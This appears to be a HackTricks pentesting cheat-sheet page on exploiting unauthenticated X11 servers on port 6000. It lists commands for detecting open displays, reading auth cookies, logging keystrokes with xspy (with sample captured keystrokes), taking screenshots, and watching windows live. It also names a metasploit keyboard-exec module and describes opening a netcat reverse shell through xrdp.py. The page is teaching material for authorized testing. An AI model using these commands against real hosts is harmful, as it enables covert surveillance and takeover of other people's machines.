6000 - Pentesting X11
- Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access to the latest version of the PEASS or download HackTricks in PDF? Check the SUBSCRIPTION PLANS!
🞠Read web3 bug tutorials
🔔 Get notified about new bug bounties
💬 Participate in community discussions
The X Window System (aka X) is a windowing system for bitmap displays, which is common on UNIX-based operating systems. X provides the basic framework for a GUI based environment. X also does not mandate the user interface – individual programs handle this.
From: https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref​
Default port: 6000
PORT STATE SERVICE
6000/tcp open X11
Check for anonymous connection:
nmap -sV --script x11-access -p <PORT> <IP>
msf> use auxiliary/scanner/x11/open_x11
MIT-magic-cookie-1: Generating 128bit of key (“cookieâ€), storing it in ~/.Xauthority (or where XAUTHORITY envvar points to). The client sends it to server plain! the server checks whether it has a copy of this “cookie†and if so, the connection is permitted. the key is generated by DMX.
In order to use the cookie you should set the env var:
export XAUTHORITY=/path/to/.Xauthorityxdpyinfo -display <ip>:<display>
xwininfo -root -tree -display <IP>:<display> #Ex: xwininfo -root -tree -display 10.5.5.12:0
Sample Output:
xspy 10.9.xx.xx
​
opened 10.9.xx.xx:0 for snoopng
swaBackSpaceCaps_Lock josephtTabcBackSpaceShift_L workShift_L 2123
qsaminusKP_Down KP_Begin KP_Down KP_Left KP_Insert TabRightLeftRightDeletebTabDownnTabKP_End KP_Right KP_Up KP_Down KP_Up KP_Up TabmtminusdBackSpacewinTab
xwd -root -screen -silent -display <TargetIP:0> > screenshot.xwd
convert screenshot.xwd screenshot.png
./xrdp.py <IP:0>
First we need to find the ID of the window using xwininfo
xwininfo -root -display 10.9.xx.xx:0
​
xwininfo: Window id: 0x45 (the root window) (has no name)
​
Absolute upper-left X: 0
Absolute upper-left Y: 0
Relative upper-left X: 0
Relative upper-left Y: 0
Width: 1024
Height: 768
Depth: 16
Visual: 0x21
Visual Class: TrueColor
Border width: 0
Class: InputOutput
Colormap: 0x20 (installed)
Bit Gravity State: ForgetGravity
Window Gravity State: NorthWestGravity
Backing Store State: NotUseful
Save Under State: no
Map State: IsViewable
Override Redirect State: no
Corners: +0+0 -0+0 -0-0 +0-0
-geometry 1024x768+0+0
XWatchwin
For live viewing we need to use
./xwatchwin [-v] [-u UpdateTime] DisplayName { -w windowID | WindowName } -w window Id is the one found on xwininfo
./xwatchwin 10.9.xx.xx:0 -w 0x45
msf> use exploit/unix/x11/x11_keyboard_exec
Other way:
Reverse Shell: Xrdp also allows to take reverse shell via Netcat. Type in the following command:
./xrdp.py <IP:0> –no-disp
It will prompt a new control pane where we can see the R-shell option, which is illustrated below:
We will start the Netcat listening mode in our local system on port 5555, which is illustrated below:
Then add the IP and port and then select R-Shell, which is illustrated below:
Now as can be seen below we have complete system access:
port:6000 x11
``
🞠Read web3 bug tutorials
🔔 Get notified about new bug bounties
💬 Participate in community discussions
- Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access to the latest version of the PEASS or download HackTricks in PDF? Check the SUBSCRIPTION PLANS!